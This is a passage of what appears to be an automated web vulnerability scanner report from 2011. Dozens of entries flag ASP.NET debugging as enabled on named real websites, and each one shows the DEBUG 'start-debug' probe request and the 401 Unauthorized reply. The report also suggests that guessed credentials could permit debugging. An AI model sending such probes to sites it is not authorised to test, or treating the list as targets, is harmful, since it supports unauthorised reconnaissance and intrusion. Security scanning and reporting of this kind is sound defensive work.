Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.41. http://www.onlyconstructionjobs.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.onlyconstructionjobs.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.onlyconstructionjobs.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 00:59:46 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.42. http://www.parsons.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.parsons.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.parsons.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 01:53:11 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
MicrosoftSharePointTeamServices: 12.0.0.6300
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.43. http://www.pickupplease.org/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.pickupplease.org
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.pickupplease.org
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 03:17:20 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.44. http://www.planbonestep.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.planbonestep.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.planbonestep.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 00:40:23 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.45. http://www.pnf.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.pnf.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.pnf.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 03:31:09 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.46. http://www.pristiq.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.pristiq.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.pristiq.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Cache-Control: private
Content-Length: 39
Content-Type: text/html; charset=utf-8
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Wed, 04 May 2011 02:00:27 GMT
Connection: close

Debug access denied to '/Default.aspx'.

18.47. http://www.pull-ups.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.pull-ups.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.pull-ups.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Set-Cookie:WEBTRENDS_ID=173.193.214.243-798515072.30149118; expires=Thu, 03-May-2012 01:54:21 GMT; path=/
Connection: close
Date: Wed, 04 May 2011 01:54:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.48. http://www.qtwebgroup.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.qtwebgroup.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.qtwebgroup.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Content-Length: 39
Date: Wed, 04 May 2011 01:23:26 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private

Debug access denied to '/Default.aspx'.

18.49. http://www.resumesstarthere.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.resumesstarthere.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.resumesstarthere.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 01:43:44 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.50. http://www.ritasice.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ritasice.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.ritasice.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 03:40:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.51. http://www.roundrockisd.org/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.roundrockisd.org
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.roundrockisd.org
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 03:20:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.52. http://www.roundtablepizza.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.roundtablepizza.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.roundtablepizza.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 03:40:55 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.53. http://www.royal.gov.uk/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.royal.gov.uk
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.royal.gov.uk
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 03:21:19 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.54. http://www.searchfreefonts.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.searchfreefonts.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.searchfreefonts.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:20:46 GMT
Connection: close
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.55. http://www.seedsavers.org/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.seedsavers.org
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.seedsavers.org
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 02:27:02 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.56. http://www.shop-insectlore.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.shop-insectlore.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.shop-insectlore.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 04:07:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.57. http://www.shoptheseasons.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.shoptheseasons.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.shoptheseasons.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Fri, 22 Apr 2011 18:52:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.58. http://www.snipercountry.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.snipercountry.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.snipercountry.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 00:43:45 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.59. http://www.sonichealthcareusa.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.sonichealthcareusa.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.sonichealthcareusa.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 01:13:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.60. http://www.sonoraquest.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.sonoraquest.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.sonoraquest.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 01:04:25 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.61. http://www.stoopcreche.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.stoopcreche.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.stoopcreche.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 04:12:46 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Basic realm="IIS - hopwalrus.com"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.62. http://www.stoopsalad.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.stoopsalad.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.stoopsalad.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 01:10:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.63. http://www.supermodels.nl/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.supermodels.nl
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.supermodels.nl
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 01:57:08 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.64. http://www.suppress003.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.suppress003.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.suppress003.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 03:47:49 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.65. http://www.textcaster.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.textcaster.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.textcaster.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 02:05:45 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.66. http://www.thehenryford.org/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.thehenryford.org
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.thehenryford.org
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Cache-Control: private
Connection: close
Date: Wed, 04 May 2011 02:58:52 GMT
Content-Length: 39
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727

Debug access denied to '/Default.aspx'.

18.67. http://www.tmkrms.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tmkrms.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.tmkrms.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 03:26:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.68. http://www.totallymoney.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.totallymoney.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.totallymoney.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 03:33:36 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.69. http://www.trackairy.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.trackairy.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.trackairy.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 02:01:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.70. http://www.trackzz.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.trackzz.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.trackzz.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: keep-alive
Date: Wed, 04 May 2011 03:50:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: LinkTrust
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.71. http://www.traitset.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.traitset.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.traitset.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 01:17:37 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.72. http://www.tri-c.edu/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tri-c.edu
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.tri-c.edu
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 02:03:34 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
MicrosoftSharePointTeamServices: 12.0.0.6211
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.73. http://www.trojancondoms.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.trojancondoms.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.trojancondoms.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 02:03:36 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.74. http://www.usadiscounters.net/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.usadiscounters.net
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.usadiscounters.net
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 04:18:32 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.75. http://www.wellsfargoadvisorsinfo.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.wellsfargoadvisorsinfo.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.wellsfargoadvisorsinfo.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 02:21:47 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.76. http://www.yamahapartshouse.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.yamahapartshouse.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.yamahapartshouse.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 01:27:06 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.77. http://www.zig5.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.zig5.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.zig5.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 00:56:38 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Basic realm="www.zig5.com"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
